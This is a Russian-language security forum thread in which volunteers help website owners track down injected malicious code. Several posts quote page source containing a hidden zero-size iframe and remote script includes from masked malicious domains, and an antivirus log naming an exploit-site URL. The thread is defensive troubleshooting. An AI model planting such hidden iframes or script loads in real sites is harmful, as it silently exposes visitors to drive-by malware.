Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
.htaccess - нет там ничего

Добавлено через 9 минут 50 секунд
ну и как мне быстро этот файлик вывернуть на изнанку, чтобы что увидеть??

Добавлено через 4 минуты 17 секунд
Чем раскомпилировать??? Чтобы быстро и наверняка, без особых навыков???
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Взять файлик исходный до изменений (смотрим в последний файловый бекап или исходные файлы движка) и сравниваем. Если есть изменения, то файл необходимо заменить. Так же необходимо проверить модули (?ID?) на наличие неизвестных врезок. Если считаете это сложным, то лучше обратится сразу к профессионалам, которые досконально знают движок портала для проведения полного аудита.

Когда последний бекап делали?

Добавлено через 1 минуту 44 секунды
Чем раскомпилировать??? Чтобы быстро и наверняка, без особых навыков???
Без навыков никак.
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
И чем увидеть айфрейм, если его нету в коде с главной страницы?

Добавлено через 3 минуты 44 секунды
Ну есть родные файлы - разницы нет, сравнил уже и заменил .htaccess и mouseover.js для верности
 

sirota

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
В коде:
PHP:
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>
Необходимо проверить содержимое всех файлов с эталоном. А так же необходимо обратится в вирлаб за помощью т.к. заражение довольно сложное для стандартных методов анализа.

http://support.kaspersky.ru/virlab/helpdesk.html

Добавлено через 23 минуты 23 секунды
И особенно присмотритесь:
[[[]]]://istur.ru/templates/younews/src/mouseover.js
akoK,

Привет! Слушай, но я тоже с этим сайтом и сервером вожусь уже ч\целый день, пробовали и скан делать через SSH и руками всё перевернули, ничего не нашли, кроме двух файлов которые относятся к другим сайтам ( на том же аккаунте ). То что ты скинул кусок кода, я не могу найти тоже самое. Вот то место
<![endif]-->
<script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script>

</head>

<body id="color">


<div id="centertop" style="font-size:11px; width:960px;">
Это код главной страницы, когда по идеи подгружается всё что есть, и iframe нету.
Короче пока в тупике, ничего не нашли на этом сайте.
 

pepper65

Активный пользователь
Сообщения
8
Реакции
0
Баллы
391
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>
просто, как это найдено было и чем?
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Лисой с отключенными NoScript и Adblock (спользовался как монитор) + просмотр кода. Ифрейм был обнаружен только 1 раз из 10 проверок.
 

sirota

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
вообщем мы его победили, с помощью бубна и логики :)
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
И куда прописан был?
 

sirota

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
Здесь /media/system/js/mootools.js

Открывал и смотрел его раз 5 точно, ничего не видел, пока через SSH не дал поиск по примерному слову , которое обычно используется в коде, только тогда нашёл его..

Могу код вирусняка выложить, так как большая часть сервисов проверок на вирусы вообще на него не реагировали, и включая siteguarg . Специально там зарегался, так он этот файл определил в безопасные :) я сегодня скинул им код для базы.
 

sirota

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
скинул на мыло код
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Код получил и даже расшифровал. Кстати получил детект эвристика.
 

ned

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
У меня на сайте не понятно откуда появился вирус, уже 4 дня воюю, пытаюсь найти, но безрезультатно. Сайт на юкозе, фреймовых окон нет,всплывающих банеров тоже. Помогите, сайт очень дорог мне, уже даже не знаю куда еще обращаться.
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
А ссылку увидеть можно неактивную?
 

ned

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
fashion-style.at.ua
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Очень много рекламы. Какой точно детект дают антивирусы? Нужно больше информации.

1. Уберите рекламу от Tizeroff
В их JS две интересные вставки
PHP:
<script type="text/javascript" src="http://golddeery.****/show-banner.php?kod=788462&amp;site=site.ru" - на который реагирует эвристика.

src="http://c***gedg.ru/iz.php" height="0" width="0">
 

ned

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Сейчас попробую, хотя просматривала неоднократно, и тизероф убирала, все равно выдавало вирус.
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
Тогда скрины в студию реакции антивируса.
 

micro

Активный пользователь
Сообщения
1
Реакции
0
Баллы
391
хттп://forum.cfin.ru
ссылка на retwite.com блокирует eset.
еще разные антивиры ругались, выдавая сообщения, которые содержали в том числе:
1.19.03.2010 15:52:35 хттп://www.cfin.ru/ad/language/english/lang.js Обнаружено: HEUR:Trojan.Script.Iframer
2.URL: over-blog-com.alice.it.baixing-com.superseasilver.ru:8080/google.co.th/google.co.th/google.com/virginmedia.com/keepvid.com.php
Name: Link to known exploit site (type 750
 

akok

Команда форума
Администратор
Сообщения
19,291
Реакции
13,320
Баллы
2,203
micro, смотрю уже удалось удалить вредоносный код. Проверьте модули форума. Обновите форум до последней актуальной версии 3.8.5 + смените пароли администраторов и пароли для доступа к ftp
 
Сверху Снизу